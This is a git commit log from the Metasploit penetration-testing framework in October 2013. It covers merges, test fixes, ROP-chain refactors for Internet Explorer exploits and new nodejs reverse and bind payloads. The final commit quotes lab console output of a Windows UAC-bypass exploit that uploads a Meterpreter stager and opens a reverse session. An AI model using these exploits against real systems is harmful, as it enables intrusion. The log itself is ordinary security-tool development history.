ZeroChaos
ce3584194f
Merge pull request #1 from todb-r7/land-2465
...
Fix up PR #2465
2013-10-09 10:23:08 -07:00
Tod Beardsley
356263df56
Litter some more rescue nil's in there
...
I hate them but they were there when I got there.
A more sane way to deal with this should happen someday.
2013-10-09 12:17:13 -05:00
Tod Beardsley
f95da649f8
Deal with missing bins, too.
...
This could be way more DRY. At least there's a YARD-ish comment.
This fixes up https://github.com/rapid7/metasploit-framework/pull/2465
to be a more complete solution.
[SeeRM #8465]
2013-10-09 12:13:44 -05:00
joev
1e78c3ca1a
Add missing require to nodejs/bind payload.
2013-10-09 11:39:05 -05:00
William Vu
3cbea09cc6
Land #2492, s/Dyn-DNS/DynDNS/
2013-10-09 10:54:43 -05:00
Tod Beardsley
c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS)
2013-10-09 09:56:07 -05:00
jvazquez-r7
2073c4e6a7
Land #2489, @mwulftange :noquotes option for CmdStagerPrintf
2013-10-09 08:29:11 -05:00
Winterspite
0acb170ee8
Bug #8419 - Added platform info missing on exploits
2013-10-08 22:41:50 -04:00
Tod Beardsley
c84e5c7443
Land #2490, new sniffer extension binaries
2013-10-08 17:15:54 -05:00
OJ
0a194b203d
Updated sniffer binaries
...
These updated binaries include a packet-sniffer fix which results in
sniffing working on x86 builds of Windows 8 and Windows 8.1.
2013-10-09 07:38:54 +10:00
sinn3r
2f0120748b
Land #2487 - Mark broken tests as pending
2013-10-08 15:10:10 -05:00
sinn3r
ef48a4b385
Land #2486 - Fix error message backtrace
2013-10-08 14:55:39 -05:00
Markus Wulftange
e895a17722
Add 'no quotes' option for CmdStagerPrintf
...
Exploit developers can use the ':noquotes => true' option to avoid
single quotes surrounding the octal escapes argument.
2013-10-08 21:04:28 +02:00
Tod Beardsley
2f670a35c4
Land #2488, ref update for ms13-080
2013-10-08 13:48:34 -05:00
sinn3r
199bd20b95
Update CVE-2013-3893's Microsoft reference
...
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
Tod Beardsley
72a35d14f1
Mark broken tests as pending
...
These tests are broken a few different ways.
[SeeRM #8463]
also see: https://github.com/rapid7/metasploit-framework/pull/2477
2013-10-08 11:49:42 -05:00
David Maloney
7d0cf73af7
Fix multi-meter_inject error msg
...
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.
FIXRM #8460
2013-10-08 11:11:38 -05:00
sinn3r
a5bace2425
Land #2485 - Removed extra bracket for scripts/meterpreter/vnc.rb
...
g0tmi1k's version was outdated, so I merged from my branch instead.
2013-10-08 10:17:49 -05:00
sinn3r
db92709d33
Remove extra bracket
2013-10-08 10:17:08 -05:00
jvazquez-r7
2593c06e7c
Land #2412, @mwulftange's printf cmd stager
2013-10-08 09:08:29 -05:00
Markus Wulftange
6f7d513f6e
Another clean up and simplification of CmdStagerPrintf
2013-10-08 07:22:09 +02:00
Tod Beardsley
8b9ac746db
Land #2481, deprecate linksys cmd exec module
2013-10-07 20:44:04 -05:00
sinn3r
c10f0253bc
Land #2472 - Clean up the way Apple Safari UXSS aux module does data collection
2013-10-07 15:47:28 -05:00
Tod Beardsley
e0ce444896
Merging release back to master
2013-10-07 15:33:16 -05:00
sinn3r
f7f6abc1dd
Land #2479 - Add Joev to the wolfpack
2013-10-07 15:30:23 -05:00
sinn3r
f4000d35ba
Use RopDb for ms13_069
...
Target tested
2013-10-07 15:24:01 -05:00
sinn3r
7222e3ca49
Use RopDb for ms13_055_canchor.
...
All targets tested.
2013-10-07 15:09:36 -05:00
sinn3r
67228bace8
Use RopDb for ie_cgenericelement_uaf.
...
All targets tested except for Vista, so additional testing will need
to be done during review.
2013-10-07 14:51:34 -05:00
Rob Fuller
aed2490536
add some output and fixing
2013-10-07 15:42:41 -04:00
Rob Fuller
75d2abc8c2
integrate some ask functionality into bypassuac
2013-10-07 15:14:54 -04:00
joev
4ba001d6dd
Put my short name to prevent conflicts.
2013-10-07 14:10:47 -05:00
joev
ec6516d87c
Deprecate misnamed module.
...
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
sinn3r
aea63130a4
Use RopDb for ie_cbutton_uaf.
...
All targets tested except for Vista. Will need additional testing
during review.
2013-10-07 14:03:07 -05:00
Tod Beardsley
61e02f3d79
Merge 'upstream-master' into release
...
Picks up #2480 as well.
2013-10-07 13:52:04 -05:00
jvazquez-r7
0991b72a0e
Land #2480, @todb-r7's changes for weekly update
2013-10-07 13:19:00 -05:00
Tod Beardsley
5c5cf6dc57
Merge 'upstream-master' into release
...
Preliminary cut for release
2013-10-07 13:15:09 -05:00
Tod Beardsley
219bef41a7
Decaps Siemens (consistent with other modules)
2013-10-07 13:12:32 -05:00
Tod Beardsley
3215453522
Empty commit to trigger a close on #2476
...
If this commit lands, it'll close #2476 because it accomplishes the same
thing.
[Closes #2476]
2013-10-07 12:51:34 -05:00
Tod Beardsley
4266b88a20
Move author name to just 'joev'
...
[See #2476]
2013-10-07 12:50:04 -05:00
Tod Beardsley
ff6dec5eee
Promote joev to a first class citizen
...
[See #2476]
2013-10-07 12:40:43 -05:00
jvazquez-r7
8b7d241dc3
Use a named subject
2013-10-07 12:28:50 -05:00
sinn3r
e016c9a62f
Use RopDb msvcrt ROP chain. Tested all targets.
2013-10-07 12:27:43 -05:00
Tod Beardsley
293927aff0
msftidy fix for coldfusion exploit
2013-10-07 12:22:48 -05:00
jvazquez-r7
d8dba8ee58
Fix ropdb spec according to @limhoff-r7's comments
2013-10-07 09:51:21 -05:00
joev
da48565093
Add more payloads for nodejs.
...
* Adds a reverse and bind CMD payload
* Adds a bind payload (no bind_ssl for now).
2013-10-07 06:09:21 -05:00
joev
47e7a2de83
Kill stray debugger statement.
2013-10-06 19:32:22 -05:00
joev
c2a81907ba
Clean up the way Apple Safari UXSS aux module does data collection.
...
[FIXRM #7918]
2013-10-06 19:28:16 -05:00
jvazquez-r7
5aa3709ca2
Land #2467, @wchen-r7's code to allow dynamic size payloads on ropdb
2013-10-06 18:18:13 -05:00
sinn3r
991e82a78a
Land #2470 - Continue to run UAC level is 0
2013-10-05 23:20:55 -05:00
trustedsec
0799766faa
Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
...
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:
Here is prior to the change on a fully patched Windows 8 machine:
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) >
Here's the module when running with the most recent changes that are being proposed:
[*] Started reverse handler on 172.16.21.156:4444
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400
meterpreter >
With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00